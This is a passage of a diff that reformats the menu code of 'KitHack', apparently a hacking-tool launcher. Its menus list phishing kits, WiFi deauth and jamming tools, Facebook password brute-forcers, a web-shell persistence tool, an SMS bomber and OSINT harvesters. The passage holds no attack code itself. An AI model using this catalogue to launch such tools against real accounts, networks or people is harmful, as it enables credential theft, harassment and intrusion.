+ elif tool == "10": kitools.EternalScanner() - elif tool == '11': + elif tool == "11": kitools.EternalblueDoublepulsarMetasploit() - elif tool == '12': + elif tool == "12": kitools.MS17010EternalBlueWinXPWin10() - elif tool == '13': + elif tool == "13": kitools.WindowsExploits() else: print("\n{}[X] INVALID OPTION".format(RED)) time.sleep(1.5) - os.system('clear') + os.system("clear") main() - elif option == '03': - os.system('clear') - print('======={0}Tool{1}======================================={0}Information{1}====================================='.format( - GREEN, DEFAULT)) - print('{0}01){1} HiddenEye {2}Modern phishing tool with advanced functionality.'.format( - WHITE, YELLOW, DEFAULT)) - print('{0}02){1} PhishX {2}Phishing and Spoofing Generator.'.format( - WHITE, YELLOW, DEFAULT)) - print('{0}03){1} SocialPhish {2}Phishing tool with 32 templates + 1 customizable.'.format(WHITE, YELLOW, DEFAULT)) - print('{0}04){1} SocialFish {2}Phishing educational tool.'.format( - WHITE, YELLOW, DEFAULT)) - print('{0}05){1} PhisherMan {2}Phishing tool with 17 templates and working with ngrok.'.format( - WHITE, YELLOW, DEFAULT)) - print('{0}06){1} Spectre {2}Supports phishing attacks with almost any website.'.format( - WHITE, YELLOW, DEFAULT)) - print('{0}07){1} Blackeye {2}Phishing tool with 38 websites available.'.format( - WHITE, YELLOW, DEFAULT)) - print('{0}08){1} PhEmail {2}Automate phishing email delivery processes.'.format( - WHITE, YELLOW, DEFAULT)) - print('{0}09){1} Weeman {2}HTTP Server for Phishing.'.format( - WHITE, YELLOW, DEFAULT)) - print('{0}10){1} Zphisher {2}Automated phishing tool.'.format( - WHITE, YELLOW, DEFAULT)) - print('{0}11){1} AIOPhish {2}Phishing tool with different options.'.format( - WHITE, YELLOW, DEFAULT)) - print('{0} 0){1} Back'.format(WHITE, YELLOW)) + elif option == "03": + os.system("clear") + print( + "======={0}Tool{1}======================================={0}Information{1}=====================================".format( + GREEN, DEFAULT + ) + ) + print( + "{0}01){1} HiddenEye {2}Modern phishing tool with advanced functionality.".format( + WHITE, YELLOW, DEFAULT + ) + ) + print( + "{0}02){1} PhishX {2}Phishing and Spoofing Generator.".format( + WHITE, YELLOW, DEFAULT + ) + ) + print( + "{0}03){1} SocialPhish {2}Phishing tool with 32 templates + 1 customizable.".format( + WHITE, YELLOW, DEFAULT + ) + ) + print( + "{0}04){1} SocialFish {2}Phishing educational tool.".format( + WHITE, YELLOW, DEFAULT + ) + ) + print( + "{0}05){1} PhisherMan {2}Phishing tool with 17 templates and working with ngrok.".format( + WHITE, YELLOW, DEFAULT + ) + ) + print( + "{0}06){1} Spectre {2}Supports phishing attacks with almost any website.".format( + WHITE, YELLOW, DEFAULT + ) + ) + print( + "{0}07){1} Blackeye {2}Phishing tool with 38 websites available.".format( + WHITE, YELLOW, DEFAULT + ) + ) + print( + "{0}08){1} PhEmail {2}Automate phishing email delivery processes.".format( + WHITE, YELLOW, DEFAULT + ) + ) + print( + "{0}09){1} Weeman {2}HTTP Server for Phishing.".format( + WHITE, YELLOW, DEFAULT + ) + ) + print( + "{0}10){1} Zphisher {2}Automated phishing tool.".format( + WHITE, YELLOW, DEFAULT + ) + ) + print( + "{0}11){1} AIOPhish {2}Phishing tool with different options.".format( + WHITE, YELLOW, DEFAULT + ) + ) + print("{0} 0){1} Back".format(WHITE, YELLOW)) tool = input("{0}KitHack >> {1}".format(RED, DEFAULT)) tool = tool.zfill(2) - if tool == '00': - os.system('clear') + if tool == "00": + os.system("clear") main() - elif tool == '01': + elif tool == "01": kitools.HiddenEye() - elif tool == '02': + elif tool == "02": kitools.PhishX() - elif tool == '03': + elif tool == "03": kitools.SocialPhish() - elif tool == '04': + elif tool == "04": kitools.SocialFish() - elif tool == '05': + elif tool == "05": kitools.PhisherMan() - elif tool == '06': + elif tool == "06": kitools.Spectre() - elif tool == '07': + elif tool == "07": kitools.Blackeye() - elif tool == '08': + elif tool == "08": kitools.PhEmail() - elif tool == '09': + elif tool == "09": kitools.Weeman() - elif tool == '10': + elif tool == "10": kitools.Zphisher() - elif tool == '11': + elif tool == "11": kitools.AIOPhish() else: print("\n{}[X] INVALID OPTION".format(RED)) time.sleep(1.5) - os.system('clear') + os.system("clear") main() - elif option == '04': - os.system('clear') - print('======={0}Tool{1}====================================={0}Information{1}======================================'.format( - GREEN, DEFAULT)) - print('{0}01){1} Fluxion {2}Network Auditing/Social Engineering Tool.'.format( - WHITE, YELLOW, DEFAULT)) - print('{0}02){1} Wifiphisher {2}WiFi Password Capture Tool Using AP.'.format( - WHITE, YELLOW, DEFAULT)) - print('{0}03){1} Wifibroot {2}WPA/WPA2 WiFi Penetration Testing Tool. '.format( - WHITE, YELLOW, DEFAULT)) - print('{0}04){1} Wifite {2}Run existing wireless auditing tools for you.'.format( - WHITE, YELLOW, DEFAULT)) - print('{0}05){1} Ettercap {2}Interceptor/sniffer/logger for switched LANs .'.format(WHITE, YELLOW, DEFAULT)) - print( - '{0}06){1} Linset {2}WPA/WPA2 Phishing Tool.'.format(WHITE, YELLOW, DEFAULT)) - print('{0}07){1} WiFi-Pumpkin {2}AP framework to easily create fake networks.'.format(WHITE, YELLOW, DEFAULT)) - print('{0}08){1} Wifresti {2}Find your wireless network password on Windows, Linux and Mac OS.'.format( - WHITE, YELLOW, DEFAULT)) - print('{0}09){1} Evil Limiter {2}Device bandwidth limiting tool.'.format( - WHITE, YELLOW, DEFAULT)) - print('{0}10){1} Netool-toolkit {2}MitM pentesting open source toolkit.'.format( - WHITE, YELLOW, DEFAULT)) - print('{0}11){1} Dracnmap {2}Tool used to exploit networks and collect data with NMAP.'.format( - WHITE, YELLOW, DEFAULT)) - print('{0}12){1} Airgeddon {2}Bash script to audit wireless networks.'.format( - WHITE, YELLOW, DEFAULT)) - print('{0}13){1} Routersploit {2}Router Penetration Testing Modules.'.format( - WHITE, YELLOW, DEFAULT)) - print('{0}14){1} Eaphammer {2}Kit to perform targeted attacks against WPA2-Enterprise networks.'.format(WHITE, YELLOW, DEFAULT)) - print('{0}15){1} VMR-MDK {2}Script to decrypt WPS wireless networks.'.format( - WHITE, YELLOW, DEFAULT)) - print('{0}16){1} Wirespy {2}Allows you to configure fast honeypots to carry out MITM.'.format( - WHITE, YELLOW, DEFAULT)) - print('{0}17){1} Wireshark {2}Network Capture/Analyzing Tool.'.format(WHITE, YELLOW, DEFAULT)) - print('{0}18){1} SniffAir {2}Wireless Pentesting Framework.'.format( - WHITE, YELLOW, DEFAULT)) - print( - '{0}19){1} WifiJammer {2}WiFi Client/Router Jammer.'.format(WHITE, YELLOW, DEFAULT)) - print('{0}20){1} KawaiiDeauther {2}WiFi DeAuth Attack Tool.'.format( - WHITE, YELLOW, DEFAULT)) - print('{0} 0){1} Back'.format(WHITE, YELLOW)) + elif option == "04": + os.system("clear") + print( + "======={0}Tool{1}====================================={0}Information{1}======================================".format( + GREEN, DEFAULT + ) + ) + print( + "{0}01){1} Fluxion {2}Network Auditing/Social Engineering Tool.".format( + WHITE, YELLOW, DEFAULT + ) + ) + print( + "{0}02){1} Wifiphisher {2}WiFi Password Capture Tool Using AP.".format( + WHITE, YELLOW, DEFAULT + ) + ) + print( + "{0}03){1} Wifibroot {2}WPA/WPA2 WiFi Penetration Testing Tool. ".format( + WHITE, YELLOW, DEFAULT + ) + ) + print( + "{0}04){1} Wifite {2}Run existing wireless auditing tools for you.".format( + WHITE, YELLOW, DEFAULT + ) + ) + print( + "{0}05){1} Ettercap {2}Interceptor/sniffer/logger for switched LANs .".format( + WHITE, YELLOW, DEFAULT + ) + ) + print( + "{0}06){1} Linset {2}WPA/WPA2 Phishing Tool.".format( + WHITE, YELLOW, DEFAULT + ) + ) + print( + "{0}07){1} WiFi-Pumpkin {2}AP framework to easily create fake networks.".format( + WHITE, YELLOW, DEFAULT + ) + ) + print( + "{0}08){1} Wifresti {2}Find your wireless network password on Windows, Linux and Mac OS.".format( + WHITE, YELLOW, DEFAULT + ) + ) + print( + "{0}09){1} Evil Limiter {2}Device bandwidth limiting tool.".format( + WHITE, YELLOW, DEFAULT + ) + ) + print( + "{0}10){1} Netool-toolkit {2}MitM pentesting open source toolkit.".format( + WHITE, YELLOW, DEFAULT + ) + ) + print( + "{0}11){1} Dracnmap {2}Tool used to exploit networks and collect data with NMAP.".format( + WHITE, YELLOW, DEFAULT + ) + ) + print( + "{0}12){1} Airgeddon {2}Bash script to audit wireless networks.".format( + WHITE, YELLOW, DEFAULT + ) + ) + print( + "{0}13){1} Routersploit {2}Router Penetration Testing Modules.".format( + WHITE, YELLOW, DEFAULT + ) + ) + print( + "{0}14){1} Eaphammer {2}Kit to perform targeted attacks against WPA2-Enterprise networks.".format( + WHITE, YELLOW, DEFAULT + ) + ) + print( + "{0}15){1} VMR-MDK {2}Script to decrypt WPS wireless networks.".format( + WHITE, YELLOW, DEFAULT + ) + ) + print( + "{0}16){1} Wirespy {2}Allows you to configure fast honeypots to carry out MITM.".format( + WHITE, YELLOW, DEFAULT + ) + ) + print( + "{0}17){1} Wireshark {2}Network Capture/Analyzing Tool.".format( + WHITE, YELLOW, DEFAULT + ) + ) + print( + "{0}18){1} SniffAir {2}Wireless Pentesting Framework.".format( + WHITE, YELLOW, DEFAULT + ) + ) + print( + "{0}19){1} WifiJammer {2}WiFi Client/Router Jammer.".format( + WHITE, YELLOW, DEFAULT + ) + ) + print( + "{0}20){1} KawaiiDeauther {2}WiFi DeAuth Attack Tool.".format( + WHITE, YELLOW, DEFAULT + ) + ) + print("{0} 0){1} Back".format(WHITE, YELLOW)) tool = input("{0}KitHack >> {1}".format(RED, DEFAULT)) tool = tool.zfill(2) - if tool == '00': - os.system('clear') + if tool == "00": + os.system("clear") main() - elif tool == '01': + elif tool == "01": kitools.Fluxion() - elif tool == '02': + elif tool == "02": kitools.Wifiphisher() - elif tool == '03': + elif tool == "03": kitools.Wifibroot() - elif tool == '04': + elif tool == "04": kitools.Wifite() - elif tool == '05': + elif tool == "05": kitools.Ettercap() - elif tool == '06': + elif tool == "06": kitools.Linset() - elif tool == '07': + elif tool == "07": kitools.WiFiPumpkin() - elif tool == '08': + elif tool == "08": kitools.Wifresti() - elif tool == '09': + elif tool == "09": kitools.EvilLimiter() - elif tool == '10': + elif tool == "10": kitools.NetoolToolkit() - elif tool == '11': + elif tool == "11": kitools.Dracnmap() - elif tool == '12': + elif tool == "12": kitools.Airgeddon() - elif tool == '13': + elif tool == "13": kitools.Routersploit() - elif tool == '14': + elif tool == "14": kitools.Eaphammer() - elif tool == '15': + elif tool == "15": kitools.VMRMDK() - elif tool == '16': + elif tool == "16": kitools.Wirespy() - elif tool == '17': + elif tool == "17": kitools.Wireshark() - elif tool == '18': + elif tool == "18": kitools.SniffAir() - elif tool == '19': + elif tool == "19": kitools.WifiJammer() - elif tool == '20': + elif tool == "20": kitools.KawaiiDeauther() else: print("\n{}[X] INVALID OPTION".format(RED)) time.sleep(1.5) - os.system('clear') + os.system("clear") main() - elif option == '05': - os.system('clear') - print('======={0}Tool{1}====================================={0}Information{1}================================'.format( - GREEN, DEFAULT)) - print('{0}01){1} Cupp {2}Allows you to create dictionaries specifically for a person.'.format( - WHITE, YELLOW, DEFAULT)) - print('{0}02){1} Facebooker {2}Facebook Password Bruteforcer Made in Perl.'.format( - WHITE, YELLOW, DEFAULT)) - print('{0}03){1} BluForce-FB {2}Facebook Password Bruteforcer.'.format(WHITE, YELLOW, DEFAULT)) - print('{0}04){1} Brut3k1t {2}Bruteforce Attack Kit.'.format( - WHITE, YELLOW, DEFAULT)) - print('{0}05){1} SocialBox {2}Bruteforce Framework.'.format( - WHITE, YELLOW, DEFAULT)) - print('{0}06){1} John The Ripper {2}Password Bruteforcing Tool.'.format( - WHITE, YELLOW, DEFAULT)) - print('{0}07){1} Hashcat {2}Hash Cracking Toolkit.'.format( - WHITE, YELLOW, DEFAULT)) - print('{0}08){1} Brutedum {2}SSH/FTP/Telnet/PostgreSQL/RDP/VNC/Medusa Bruteforcer.'.format(WHITE, YELLOW, DEFAULT)) - print('{0}09){1} Facebash {2}Facebook Bruteforcer Made in Shellscript Using TOR.'.format( - WHITE, YELLOW, DEFAULT)) - print( - '{0}10){1} Brutespray {2}Port Scanner/Bruteforcer.'.format(WHITE, YELLOW, DEFAULT)) - print('{0}11){1} Pupi {2}Password Generator Using Personal Information.'.format( - WHITE, YELLOW, DEFAULT)) - print('{0}12){1} B4r-brute {2}Facebook Account Cracker Using User ID.'.format( - WHITE, YELLOW, DEFAULT)) - print('{0}13){1} Fb-Hack {2}Facebook Password "Hack"/Recovery Script.'.format( - WHITE, YELLOW, DEFAULT)) - print('{0} 0){1} Back'.format(WHITE, YELLOW)) + elif option == "05": + os.system("clear") + print( + "======={0}Tool{1}====================================={0}Information{1}================================".format( + GREEN, DEFAULT + ) + ) + print( + "{0}01){1} Cupp {2}Allows you to create dictionaries specifically for a person.".format( + WHITE, YELLOW, DEFAULT + ) + ) + print( + "{0}02){1} Facebooker {2}Facebook Password Bruteforcer Made in Perl.".format( + WHITE, YELLOW, DEFAULT + ) + ) + print( + "{0}03){1} BluForce-FB {2}Facebook Password Bruteforcer.".format( + WHITE, YELLOW, DEFAULT + ) + ) + print( + "{0}04){1} Brut3k1t {2}Bruteforce Attack Kit.".format( + WHITE, YELLOW, DEFAULT + ) + ) + print( + "{0}05){1} SocialBox {2}Bruteforce Framework.".format( + WHITE, YELLOW, DEFAULT + ) + ) + print( + "{0}06){1} John The Ripper {2}Password Bruteforcing Tool.".format( + WHITE, YELLOW, DEFAULT + ) + ) + print( + "{0}07){1} Hashcat {2}Hash Cracking Toolkit.".format( + WHITE, YELLOW, DEFAULT + ) + ) + print( + "{0}08){1} Brutedum {2}SSH/FTP/Telnet/PostgreSQL/RDP/VNC/Medusa Bruteforcer.".format( + WHITE, YELLOW, DEFAULT + ) + ) + print( + "{0}09){1} Facebash {2}Facebook Bruteforcer Made in Shellscript Using TOR.".format( + WHITE, YELLOW, DEFAULT + ) + ) + print( + "{0}10){1} Brutespray {2}Port Scanner/Bruteforcer.".format( + WHITE, YELLOW, DEFAULT + ) + ) + print( + "{0}11){1} Pupi {2}Password Generator Using Personal Information.".format( + WHITE, YELLOW, DEFAULT + ) + ) + print( + "{0}12){1} B4r-brute {2}Facebook Account Cracker Using User ID.".format( + WHITE, YELLOW, DEFAULT + ) + ) + print( + '{0}13){1} Fb-Hack {2}Facebook Password "Hack"/Recovery Script.'.format( + WHITE, YELLOW, DEFAULT + ) + ) + print("{0} 0){1} Back".format(WHITE, YELLOW)) tool = input("{0}KitHack >> {1}".format(RED, DEFAULT)) tool = tool.zfill(2) - if tool == '00': - os.system('clear') + if tool == "00": + os.system("clear") main() - elif tool == '01': + elif tool == "01": kitools.Cupp() - elif tool == '02': + elif tool == "02": kitools.Facebooker() - elif tool == '03': + elif tool == "03": kitools.BluForceFB() - elif tool == '04': + elif tool == "04": kitools.Brut3k1t() - elif tool == '05': + elif tool == "05": kitools.SocialBox() - elif tool == '06': + elif tool == "06": kitools.JohnTheRipper() - elif tool == '07': + elif tool == "07": kitools.Hashcat() - elif tool == '08': + elif tool == "08": kitools.Brutedum() - elif tool == '09': + elif tool == "09": kitools.Facebash() - elif tool == '10': + elif tool == "10": kitools.Brutespray() - elif tool == '11': + elif tool == "11": kitools.Pupi() - elif tool == '12': + elif tool == "12": kitools.B4rbrute() - elif tool == '13': + elif tool == "13": kitools.FbHack() else: print("\n{}[X] INVALID OPTION".format(RED)) time.sleep(1.5) - os.system('clear') + os.system("clear") main() - elif option == '06': - os.system('clear') - print('======={0}Tool{1}========================================={0}Information{1}========================================'.format( - GREEN, DEFAULT)) - print('{0}01){1} SQLmap {2}SQLi Penetration Testing Tool.'.format( - WHITE, YELLOW, DEFAULT)) - print('{0}02){1} XAttacker {2}Website Vulnerability Scanner.'.format( - WHITE, YELLOW, DEFAULT)) - print('{0}03){1} Fuxploider {2}Detect favorable techniques to load web shells or any malicious files.'.format( - WHITE, YELLOW, DEFAULT)) - print('{0}04){1} Wordpresscan {2}WordPress Vulnerability Scanner.'.format( - WHITE, YELLOW, DEFAULT)) - print('{0}05){1} SiteBroker {2}Information Collecting/Website Penetration Testing Tool.'.format(WHITE, YELLOW, DEFAULT)) - print('{0}06){1} NoSQLMap {2}NoSQL Default Configuration Weakness Exploitation Tool.'.format( - WHITE, YELLOW, DEFAULT)) - print('{0}07){1} Sqli-scanner {2}SQL Injection Vulnerability Scanner.'.format( - WHITE, YELLOW, DEFAULT)) - print('{0}08){1} Joomscan {2}Website Misconfiguration Scanner.'.format( - WHITE, YELLOW, DEFAULT)) - print('{0}09){1} Metagoofil {2}Metadata Extraction Tool.'.format( - WHITE, YELLOW, DEFAULT)) - print('{0}10){1} Sublist3r {2}Subdomain Enumeration Tool.'.format( - WHITE, YELLOW, DEFAULT)) - print('{0}11){1} WAFNinja {2}Web Application Firewall Attacker.'.format( - WHITE, YELLOW, DEFAULT)) - print('{0}12){1} Dirsearch {2}Directory/File Path Bruteforcing Tool.'.format( - WHITE, YELLOW, DEFAULT)) - print('{0}13){1} XSStrike {2}Advanced XSS Scanner.'.format( - WHITE, YELLOW, DEFAULT)) - print('{0}14){1} LinksF1nd3r {2}Web Component Extractor.'.format( - WHITE, YELLOW, DEFAULT)) - print('{0}15){1} D-TECT {2}Modern Website Penetration Testing Tool.'.format( - WHITE, YELLOW, DEFAULT)) - print('{0}16){1} Phpsploit {2}Tool capable of maintaining access to a compromised web server.'.format( - WHITE, YELLOW, DEFAULT)) - print('{0} 0){1} Back'.format(WHITE, YELLOW)) + elif option == "06": + os.system("clear") + print( + "======={0}Tool{1}========================================={0}Information{1}========================================".format( + GREEN, DEFAULT + ) + ) + print( + "{0}01){1} SQLmap {2}SQLi Penetration Testing Tool.".format( + WHITE, YELLOW, DEFAULT + ) + ) + print( + "{0}02){1} XAttacker {2}Website Vulnerability Scanner.".format( + WHITE, YELLOW, DEFAULT + ) + ) + print( + "{0}03){1} Fuxploider {2}Detect favorable techniques to load web shells or any malicious files.".format( + WHITE, YELLOW, DEFAULT + ) + ) + print( + "{0}04){1} Wordpresscan {2}WordPress Vulnerability Scanner.".format( + WHITE, YELLOW, DEFAULT + ) + ) + print( + "{0}05){1} SiteBroker {2}Information Collecting/Website Penetration Testing Tool.".format( + WHITE, YELLOW, DEFAULT + ) + ) + print( + "{0}06){1} NoSQLMap {2}NoSQL Default Configuration Weakness Exploitation Tool.".format( + WHITE, YELLOW, DEFAULT + ) + ) + print( + "{0}07){1} Sqli-scanner {2}SQL Injection Vulnerability Scanner.".format( + WHITE, YELLOW, DEFAULT + ) + ) + print( + "{0}08){1} Joomscan {2}Website Misconfiguration Scanner.".format( + WHITE, YELLOW, DEFAULT + ) + ) + print( + "{0}09){1} Metagoofil {2}Metadata Extraction Tool.".format( + WHITE, YELLOW, DEFAULT + ) + ) + print( + "{0}10){1} Sublist3r {2}Subdomain Enumeration Tool.".format( + WHITE, YELLOW, DEFAULT + ) + ) + print( + "{0}11){1} WAFNinja {2}Web Application Firewall Attacker.".format( + WHITE, YELLOW, DEFAULT + ) + ) + print( + "{0}12){1} Dirsearch {2}Directory/File Path Bruteforcing Tool.".format( + WHITE, YELLOW, DEFAULT + ) + ) + print( + "{0}13){1} XSStrike {2}Advanced XSS Scanner.".format( + WHITE, YELLOW, DEFAULT + ) + ) + print( + "{0}14){1} LinksF1nd3r {2}Web Component Extractor.".format( + WHITE, YELLOW, DEFAULT + ) + ) + print( + "{0}15){1} D-TECT {2}Modern Website Penetration Testing Tool.".format( + WHITE, YELLOW, DEFAULT + ) + ) + print( + "{0}16){1} Phpsploit {2}Tool capable of maintaining access to a compromised web server.".format( + WHITE, YELLOW, DEFAULT + ) + ) + print("{0} 0){1} Back".format(WHITE, YELLOW)) tool = input("{0}KitHack >> {1}".format(RED, DEFAULT)) tool = tool.zfill(2) - if tool == '00': - os.system('clear') + if tool == "00": + os.system("clear") main() - elif tool == '01': + elif tool == "01": kitools.SQLmap() - elif tool == '02': + elif tool == "02": kitools.XAttacker() - elif tool == '03': + elif tool == "03": kitools.Fuxploider() - elif tool == '04': + elif tool == "04": kitools.Wordpresscan() - elif tool == '05': + elif tool == "05": kitools.SiteBroker() - elif tool == '06': + elif tool == "06": kitools.NoSQLMap() - elif tool == '07': + elif tool == "07": kitools.SqliScanner() - elif tool == '08': + elif tool == "08": kitools.Joomscan() - elif tool == '09': + elif tool == "09": kitools.Metagoofil() - elif tool == '10': + elif tool == "10": kitools.Sublist3r() - elif tool == '11': + elif tool == "11": kitools.WAFNinja() - elif tool == '12': + elif tool == "12": kitools.Dirsearch() - elif tool == '13': + elif tool == "13": kitools.XSStrike() - elif tool == '14': + elif tool == "14": kitools.LinksF1nd3r() - elif tool == '15': + elif tool == "15": kitools.DTECH() - elif tool == '16': + elif tool == "16": kitools.Phpsploit() else: print("\n{}[X] INVALID OPTION".format(RED)) time.sleep(1.5) - os.system('clear') + os.system("clear") main() - elif option == '07': - os.system('clear') - print('======={0}Tool{1}====================================={0}Information{1}=================================='.format( - GREEN, DEFAULT)) - print('{0}01){1} SpoofMAC {2}MAC Address Spoofing Tool.'.format( - WHITE, YELLOW, DEFAULT)) + elif option == "07": + os.system("clear") + print( + "======={0}Tool{1}====================================={0}Information{1}==================================".format( + GREEN, DEFAULT + ) + ) + print( + "{0}01){1} SpoofMAC {2}MAC Address Spoofing Tool.".format( + WHITE, YELLOW, DEFAULT + ) + ) + print( + "{0}02){1} Ip_spoofing {2}ARP/HTTP Spoofing Tool.".format( + WHITE, YELLOW, DEFAULT + ) + ) print( - '{0}02){1} Ip_spoofing {2}ARP/HTTP Spoofing Tool.'.format(WHITE, YELLOW, DEFAULT)) - print('{0}03){1} Arpspoof {2}ARP Spoofing Attacl Tool Using Linux Kernel Sockets.'.format( - WHITE, YELLOW, DEFAULT)) - print('{0}04){1} DerpNSpoof {2}Simple DNS Spoofing Tool.'.format( - WHITE, YELLOW, DEFAULT)) - print('{0}05){1} DrSpoof {2}ARP Spoofing Detection Tool For Local Networks.'.format( - WHITE, YELLOW, DEFAULT)) + "{0}03){1} Arpspoof {2}ARP Spoofing Attacl Tool Using Linux Kernel Sockets.".format( + WHITE, YELLOW, DEFAULT + ) + ) print( - '{0}06){1} GODKILLER {2}SMS Bomber/Sender.'.format(WHITE, YELLOW, DEFAULT)) - print('{0} 0){1} Back'.format(WHITE, YELLOW)) + "{0}04){1} DerpNSpoof {2}Simple DNS Spoofing Tool.".format( + WHITE, YELLOW, DEFAULT + ) + ) + print( + "{0}05){1} DrSpoof {2}ARP Spoofing Detection Tool For Local Networks.".format( + WHITE, YELLOW, DEFAULT + ) + ) + print( + "{0}06){1} GODKILLER {2}SMS Bomber/Sender.".format( + WHITE, YELLOW, DEFAULT + ) + ) + print("{0} 0){1} Back".format(WHITE, YELLOW)) tool = input("{0}KitHack >> {1}".format(RED, DEFAULT)) tool = tool.zfill(2) - if tool == '00': - os.system('clear') + if tool == "00": + os.system("clear") main() - elif tool == '01': + elif tool == "01": kitools.SpoofMAC() - elif tool == '02': + elif tool == "02": kitools.IpSpoofing() - elif tool == '03': + elif tool == "03": kitools.Arpspoof() - elif tool == '04': + elif tool == "04": kitools.DerpNSpoof() - elif tool == '05': + elif tool == "05": kitools.DrSpoof() - elif tool == '06': + elif tool == "06": kitools.GODKILLER() else: print("\n{}[X] INVALID OPTION".format(RED)) time.sleep(1.5) - os.system('clear') + os.system("clear") main() - elif option == '08': - os.system('clear') - print('========={0}Tool{1}========================================{0}Information{1}========================================'.format( - GREEN, DEFAULT)) - print('{0}01){1} NMAP {2}Network Scanning Tool.'.format( - WHITE, YELLOW, DEFAULT)) - print('{0}02){1} Th3inspector {2}AIO Information Gathering Tool.'.format( - WHITE, YELLOW, DEFAULT)) - print('{0}03){1} FBI {2}Collection of sensitive information on Facebook accounts.'.format( - WHITE, YELLOW, DEFAULT)) - print('{0}04){1} Infoga {2}Email Information Extraction Tool.'.format( - WHITE, YELLOW, DEFAULT)) - print('{0}05){1} Crips {2}IP Address/Website/DNS Record Lookup Tool.'.format( - WHITE, YELLOW, DEFAULT)) - print('{0}06){1} BillCipher {2}Website/IP Address Information Lookup Tool.'.format( - WHITE, YELLOW, DEFAULT)) - print('{0}07){1} RED_HAWK {2}Tool to collect information, scan vulnerabilities and trace.'.format( - WHITE, YELLOW, DEFAULT)) - print( - '{0}08){1} Recon-ng {2}Information Gathering Tool.'.format(WHITE, YELLOW, DEFAULT)) - print('{0}09){1} theHarvester {2}Collection of emails, names, subdomains, IP addresses and URLs.'.format( - WHITE, YELLOW, DEFAULT)) - print('{0}10){1} PhoneInfoga {2}Phone Number Information Lookup Tool.'.format( - WHITE, YELLOW, DEFAULT)) - print('{0}11){1} Gasmask {2}AIO Information Gathering Tool #2.'.format( - WHITE, YELLOW, DEFAULT)) - print('{0}12){1} URLextractor {2}Website Information Gathering/Reconnaissance Tool.'.format(WHITE, YELLOW, DEFAULT)) - print('{0}13){1} Devploit {2}Website DNS/WhoIS/IP/GeoIP/Subnet/Port/Host Lookup Tool'.format(WHITE, YELLOW, DEFAULT)) - print('{0}14){1} ReconDog {2}AIO Basic Information Gathering Tool.'.format( - WHITE, YELLOW, DEFAULT)) - print('{0}15){1} Webkiller {2}Information Collection Kit.'.format( - WHITE, YELLOW, DEFAULT)) - print('{0}16){1} Quasar {2}Information Collection Framework.'.format( - WHITE, YELLOW, DEFAULT)) - print('{0}17){1} Info-instagram {2}Instagram Information Extraction Tool.'.format( - WHITE, YELLOW, DEFAULT)) - print('{0}18){1} UserScan {2}Username Lookup/Identity Scanner Tool.'.format( - WHITE, YELLOW, DEFAULT)) - print('{0}19){1} XCTR-Hacking {2}AIO Information Gathering Tool #3.'.format( - WHITE, YELLOW, DEFAULT)) - print('{0}20){1} DeadTrap {2}Phone Number OSINT Tool.'.format( - WHITE, YELLOW, DEFAULT)) - print('{0} 0){1} Back'.format(WHITE, YELLOW)) + elif option == "08": + os.system("clear") + print( + "========={0}Tool{1}========================================{0}Information{1}========================================".format( + GREEN, DEFAULT + ) + ) + print( + "{0}01){1} NMAP {2}Network Scanning Tool.".format( + WHITE, YELLOW, DEFAULT + ) + ) + print( + "{0}02){1} Th3inspector {2}AIO Information Gathering Tool.".format( + WHITE, YELLOW, DEFAULT + ) + ) + print( + "{0}03){1} FBI {2}Collection of sensitive information on Facebook accounts.".format( + WHITE, YELLOW, DEFAULT + ) + ) + print( + "{0}04){1} Infoga {2}Email Information Extraction Tool.".format( + WHITE, YELLOW, DEFAULT + ) + ) + print( + "{0}05){1} Crips {2}IP Address/Website/DNS Record Lookup Tool.".format( + WHITE, YELLOW, DEFAULT + ) + ) + print( + "{0}06){1} BillCipher {2}Website/IP Address Information Lookup Tool.".format( + WHITE, YELLOW, DEFAULT + ) + ) + print( + "{0}07){1} RED_HAWK {2}Tool to collect information, scan vulnerabilities and trace.".format( + WHITE, YELLOW, DEFAULT + ) + ) + print( + "{0}08){1} Recon-ng {2}Information Gathering Tool.".format( + WHITE, YELLOW, DEFAULT + ) + ) + print( + "{0}09){1} theHarvester {2}Collection of emails, names, subdomains, IP addresses and URLs.".format( + WHITE, YELLOW, DEFAULT + ) + ) + print( + "{0}10){1} PhoneInfoga {2}Phone Number Information Lookup Tool.".format( + WHITE, YELLOW, DEFAULT + ) + ) + print( + "{0}11){1} Gasmask {2}AIO Information Gathering Tool #2.".format( + WHITE, YELLOW, DEFAULT + ) + ) + print( + "{0}12){1} URLextractor {2}Website Information Gathering/Reconnaissance Tool.".format( + WHITE, YELLOW, DEFAULT + ) + ) + print( + "{0}13){1} Devploit {2}Website DNS/WhoIS/IP/GeoIP/Subnet/Port/Host Lookup Tool".format( + WHITE, YELLOW, DEFAULT + ) + ) + print( + "{0}14){1} ReconDog {2}AIO Basic Information Gathering Tool.".format( + WHITE, YELLOW, DEFAULT + ) + ) + print( + "{0}15){1} Webkiller {2}Information Collection Kit.".format( + WHITE, YELLOW, DEFAULT + ) + ) + print( + "{0}16){1} Quasar {2}Information Collection Framework.".format( + WHITE, YELLOW, DEFAULT + ) + ) + print( + "{0}17){1} Info-instagram {2}Instagram Information Extraction Tool.".format( + WHITE, YELLOW, DEFAULT + ) + ) + print( + "{0}18){1} UserScan {2}Username Lookup/Identity Scanner Tool.".format( + WHITE, YELLOW, DEFAULT + ) + ) + print( + "{0}19){1} XCTR-Hacking {2}AIO Information Gathering Tool #3.".format( + WHITE, YELLOW, DEFAULT + ) + ) + print( + "{0}20){1} DeadTrap {2}Phone Number OSINT Tool.".format( + WHITE, YELLOW, DEFAULT + ) + ) + print("{0} 0){1} Back".format(WHITE, YELLOW)) tool = input("{0}KitHack >> {1}".format(RED, DEFAULT)) tool = tool.zfill(2) - if tool == '00': - os.system('clear') + if tool == "00": + os.system("clear") main() - elif tool == '01': + elif tool == "01": kitools.NMAP() - elif tool == '02': + elif tool == "02": kitools.Th3inspector() - elif tool == '03': + elif tool == "03": kitools.FBI() - elif tool == '04': + elif tool == "04": kitools.Infoga() - elif tool == '05': + elif tool == "05": kitools.Crips() - elif tool == '06': + elif tool == "06": kitools.BillCipher() - elif tool == '07': + elif tool == "07": kitools.RedHawk() - elif tool == '08': + elif tool == "08": kitools.ReconNg() - elif tool == '09': + elif tool == "09": kitools.theHarvester() - elif tool == '10': + elif tool == "10": kitools.PhoneInfoga() - elif tool == '11': + elif tool == "11": kitools.Gasmask() - elif tool == '12': + elif tool == "12": kitools.URLextractor() - elif tool == '13': + elif tool == "13": kitools.Devploit() - elif tool == '14': + elif tool == "14": kitools.ReconDog() - elif tool == '15': + elif tool == "15": kitools.Webkiller() - elif tool == '16': + elif tool == "16": kitools.Quasar() - elif tool == '17': + elif tool == "17": kitools.InfoInstagramIphone() - elif tool == '18': + elif tool == "18": 